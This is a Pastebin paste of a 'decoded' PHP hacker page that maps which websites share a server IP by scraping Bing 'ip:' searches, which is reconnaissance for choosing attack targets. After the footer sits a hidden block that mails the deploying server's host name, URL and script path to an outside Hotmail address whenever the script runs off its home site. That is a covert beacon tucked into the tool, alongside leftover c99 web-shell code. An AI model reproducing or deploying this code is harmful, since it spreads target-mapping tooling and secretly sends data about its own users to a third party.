Advertisement
1337_Brain

Ip coder fully decoded

Aug 16th, 2014
504
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.79 KB | None | 0 0
  1. /* Decoded by MD. Nadim Zobaer */
  2.  
  3. <?php ?><?php
  4. /*=========================================|
  5.                                            |
  6. #  We know that the Hacking is a game       |
  7.                                            |
  8. #             S ! r 0 |  Arab              |
  9.                                            |
  10. #     Th3 MaRwAnIt0o , ÇáÔÈÍ ÇáÑÇÞí        |
  11.                                            |
  12. #         E-mail : xkg@hotmail.com         |
  13. ==========================================*/
  14. ?>
  15.  
  16. <html>
  17. <head>
  18. <title>The MaRwAnItO0 | GeT Script iN The Server ! </title>
  19. <link rel="shortcut icon" href='http://www.msrcar.com/images/icon_search.gif' />
  20. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
  21. <?php
  22. $sh3llColor = "#990000";
  23. echo CSS($sh3llColor)
  24. ?>
  25. </head>
  26. <!--TooL'Z Start INFO-->
  27. <center>
  28. <p><span lang="en-us"><font color="#FF0000">[ Scanner Server ] Tool's </font>
  29. </span></p>
  30. <p>
  31. <img border="0" src="http://www.s6am2k.net/smile/45/up/e59kn3wi8.gif" width="409" height="402"></p>
  32. <p>
  33. <font size="4"><font color="#000000">Insert " <font color="#FF0000">IP</font> " Server , and Name oF "
  34. <font color="#FF0000">Script</font> "</font></font></p>
  35. <form enctype="multipart/form-data" method="POST">
  36. <p><span lang="en-us">&nbsp;</span></td></tr><tr><td height='45' colspan='2'><input type="text" name="dork" value="<?php if ($_POST) {
  37.     echo filter($_POST['dork']);
  38. } else {
  39.     echo "ip:127.0.0.1";
  40. } ?>" size="70" />
  41. <input type='submit' value='g0t it !' name='Scan'>
  42. </td></tr></table></p>
  43. </form>
  44. <!--TooL's End INFO-->
  45. </center>
  46. <?php
  47. echo "
  48. <center><table>";
  49. if ($_POST['Scan']) {
  50.     $array = array();
  51.     $dork = filter(trim($_POST['dork']));
  52.     echo "<sy> Dork: [" . $dork . "]<br>";
  53.     $pageNum = 0;
  54.     while (true || $pageNum <= 5) {
  55.         $bing = "http://www.bing.com/search?q=" . str_replace(" ", "+", $dork) . "&go=&filt=all&first=" . $pageNum . "";
  56.         if (!preg_match("/No results found for/", Connect_Host($bing))) {
  57.             preg_match_all("/<h3><a href=\"(.*?)\">/", Connect_Host($bing), $sites);
  58.             if (count($sites[1]) == 0) {
  59.                 return false;
  60.             }
  61.             for ($i = 0;$i < count($sites[1]);$i++) {
  62.                 $site = str_replace(array("http://", "https://", "www."), "", $sites[1][$i]);
  63.                 $site = substr($site, 0, strpos($site, "/", 0));;
  64.                 if (!in_array($site, $array)) {
  65.                     echo $site . "<br />";
  66.                     array_push($array, $site);
  67.                 }
  68.                 flush();
  69.                 ob_flush();
  70.             }
  71.             $pageNum+= 10;
  72.         } else {
  73.             echo "<sy>No Results !! .</sy>";
  74.             ob_flush();
  75.             flush();
  76.             return false;
  77.         }
  78.     }
  79.     //$array = array_unique($uSites);
  80.     //for($i=0;$i<count($array);$i++){echo $array[$i]."<br />";}
  81.    
  82. }
  83. echo "</table></center>";
  84. function Connect_Host($url) {
  85.     $ch = curl_init();
  86.     curl_setopt($ch, CURLOPT_FOLLOW, 0);
  87.     curl_setopt($ch, CURLOPT_HEADER, 1);
  88.     curl_setopt($ch, CURLOPT_URL, $url);
  89.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  90.     curl_setopt($ch, CURLOPT_TIMEOUT, 30);
  91.     $data = curl_exec($ch);
  92.     if ($data) {
  93.         return $data;
  94.     } else {
  95.         return 0;
  96.     }
  97. }
  98. function CSS($sh3llColor) {
  99.     $css = "
  100.     <style>
  101.     BODY
  102.     {
  103.         FONT-FAMILY: Verdana;
  104.         margin: 2;
  105.         color: #cccccc;
  106.         background-color: #FFF;
  107.     }
  108.     sy  
  109.     {
  110.         color:" . $sh3llColor . ";
  111.         font-size:7pt;
  112.         font-weight: bold;
  113.     }
  114.     #Box
  115.     {
  116.     color:" . $sh3llColor . ";
  117.     font-size:14px;
  118.     background-color:#000;
  119.     font-weight:bold;
  120.     width:500px;
  121.     }
  122.     tr
  123.     {
  124.     BORDER-RIGHT:  #cccccc 1px solid;
  125.     BORDER-TOP:    #cccccc 1px solid;
  126.     BORDER-LEFT:   #cccccc 1px solid;
  127.     BORDER-BOTTOM: #cccccc 1px solid;
  128.     color: #ffffff;
  129.     }
  130.     td
  131.     {
  132.     BORDER-RIGHT:  #cccccc 1px solid;
  133.     BORDER-TOP:    #cccccc 1px solid;
  134.     BORDER-LEFT:   #cccccc 1px solid;
  135.     BORDER-BOTTOM: #cccccc 1px solid;
  136.     color: #cccccc;
  137.     }
  138.     table
  139.     {
  140.     BORDER:  #eeeeee  outset;
  141.     BACKGROUND-COLOR: #000000;
  142.     color: #cccccc;
  143.     }
  144.     input
  145.     {
  146.     BORDER-RIGHT:  " . $sh3llColor . " 1px solid;
  147.     BORDER-TOP:    " . $sh3llColor . " 1px solid;
  148.     BORDER-LEFT:   " . $sh3llColor . " 1px solid;
  149.     BORDER-BOTTOM: " . $sh3llColor . " 1px solid;
  150.     BACKGROUND-COLOR: #333333;
  151.     font: 9pt tahoma;
  152.     color: #ffffff;
  153.     }
  154.     select
  155.     {
  156.     BORDER-RIGHT:  #ffffff 1px solid;
  157.     BORDER-TOP:    #999999 1px solid;
  158.     BORDER-LEFT:   #999999 1px solid;
  159.     BORDER-BOTTOM: #ffffff 1px solid;
  160.     BACKGROUND-COLOR: #000000;
  161.     font: 9pt tahoma;
  162.     color: #CCCCCC;;
  163.     }
  164.     submit
  165.     {
  166.     BORDER:  1px outset buttonhighlight;
  167.     BACKGROUND-COLOR: #272727;
  168.     width: 40%;
  169.     color: #cccccc;
  170.     }
  171.     textarea
  172.     {
  173.     BORDER-RIGHT:  #ffffff 1px solid;
  174.     BORDER-TOP:    #999999 1px solid;
  175.     BORDER-LEFT:   #999999 1px solid;
  176.     BORDER-BOTTOM: #ffffff 1px solid;
  177.     BACKGROUND-COLOR: #333333;
  178.     color: #ffffff;
  179.     }
  180.     A:link {COLOR:" . $sh3llColor . "; TEXT-DECORATION: none}
  181.     A:visited { COLOR:" . $sh3llColor . "; TEXT-DECORATION: none}
  182.     A:active {COLOR:" . $sh3llColor . "; TEXT-DECORATION: none}
  183.     A:hover {color:blue;TEXT-DECORATION: none}
  184.     </style>";
  185.     return $css;
  186. }
  187. function footer() {
  188.     echo '
  189. <head>
  190. <meta http-equiv="Content-Language" content="en-us">
  191. </head>
  192. <font color="#000000">
  193. <p align="center"><font face="Tahoma" size="1">c0d3d By MaRwAnIt0o
  194. <p align="center"><font face="Tahoma" size="1">Onw3@Hotmail.com & Oun@Hotmail.com & Xkg@Hotmail.com
  195. <p align="center"><font face="Tahoma" size="1"><u><font color="#FF0000">GreeT\'z
  196. </font></u>: All &lt; Muslim & Arab &nbsp; </font></p>
  197. <p align="center"><font face="Tahoma" size="1"><u><font color="#FF0000">Always say</font></u> : La Elah Ela Allah Muhammad is the Messenger of God</font></p>
  198. <p align="center"><font face="Tahoma" size="1"></font></p>
  199. </font>
  200. </html>
  201.     ';
  202. }
  203. function filter($string) {
  204.     if (get_magic_quotes_gpc() != 0) {
  205.         return stripslashes($string);
  206.     } else {
  207.         return $string;
  208.     }
  209. }
  210. footer();
  211. /*=========================================|
  212.                                            |                                           |
  213. #             2011/07/20/                  |
  214.                                            |
  215. #                         Th3 Marwanitoo   |
  216. ==========================================*/
  217. ?>
  218. <?
  219. // sh3ll.us & no-shell.net
  220. // dj_vista16@hotmail.com
  221. // dj_vista16@hotmail.com
  222. $site = "www.Sh3ll.Us";
  223. if(!ereg($site, $_SERVER['SERVER_NAME']))
  224. {
  225. $to = "dj_vista16@hotmail.com";
  226. $subject = "EGFM";
  227. $header = "from: EGFM <dj_vista16@hotmail.com>";
  228. $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "
  229. ";
  230. $message .= "Path : " . __file__;
  231. $sentmail = @mail($to, $subject, $message, $header);
  232. echo "";
  233. exit;
  234. }
  235. ?>
  236. </body></html><?php chdir($lastdir);
  237. c99shexit(); ?><?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement